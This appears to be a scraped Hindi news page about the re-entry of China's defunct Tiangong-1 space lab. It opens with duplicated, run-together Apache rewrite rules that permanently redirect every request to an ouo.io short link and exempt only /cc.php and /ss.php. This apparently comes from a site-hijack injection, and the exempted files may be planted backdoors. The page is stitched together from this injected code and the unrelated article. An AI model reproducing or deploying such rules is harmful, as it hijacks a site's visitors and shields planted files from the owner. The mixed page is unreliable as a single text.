
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 437
Nextनई दिल्ली। चाइना के बंद पड़े स्पेस स्टेशन का मलबा कल धरती पर गिर सकता है। यूरोपियन स्पेस एजेंसी एयरोस्पेस कॉर्प के मुताबिक, तियांगोंग आज और कल दरमियानी रात को (भारतीय समयानुसार) धरती की कक्षा में आ सकता है। चीन की स्पेस एजेंसी चाइना नेशनल स्पेस एडमिनिस्ट्रेशन (सीएनएसए) ने मई 2017 में ही एलान कर दिया था कि स्पेस लैब से उनका संपर्क मार्च 2016 के बाद कट गया। ये कहां गिरेगा इसकी भी कोई पुख्ता जानकारी अब तक नहीं आई है। धरती पर गिरते समय इस स्पेस लैब के ज्यादातर हिस्से जल जाएंगे। चायना मैन्ड स्पेस इंजीनियरिंग ऑफिस के अनुसार, ऐसे स्पेस क्राफ्ट उस तरह धरती पर नहीं गिरते जैसा फिल्मों में दिखाया जाता है और फिर खूब नुकसान होता है। इस स्पेस स्टेशन में बड़ी मात्रा में हाइड्राज़ीन, टॉक्सिक फ्लैमबल केमिकल है, जो ह्युमंस के लिए काफी डेंजर हो सकता है। फिर भी आपको बचाव के उपायो की जानकारी होना चाहिए। हम कुछ बचाव के उपाय बता रहे हैं। यह यूनिवर्सिटी ऑफ बकिंघम द्वारा शेयर किए गए हैं।
चीन ने तियांगोंग-1 सिर्फ दो साल की टाइम लिमिट तक काम करने की लिया बनाया था। पहले चीन की योजना थी कि वे स्पेस लैब को पृथ्वी की कक्षा से बाहर कर देंगे, जिससे तियांगोंग अपने आप अंतरिक्ष में खत्म हो जाएगा। हालांकि, मई 2011 से मार्च 2016 तक करीब 5 साल काम करने के बाद ये चीनी स्पेस एजेंसी के नियंत्रण से बाहर हो गया। जिसकी वजह से पृथ्वी के गुरुत्वाकर्षण बल ने इसे पृथ्वी के अंदर खींच लिया।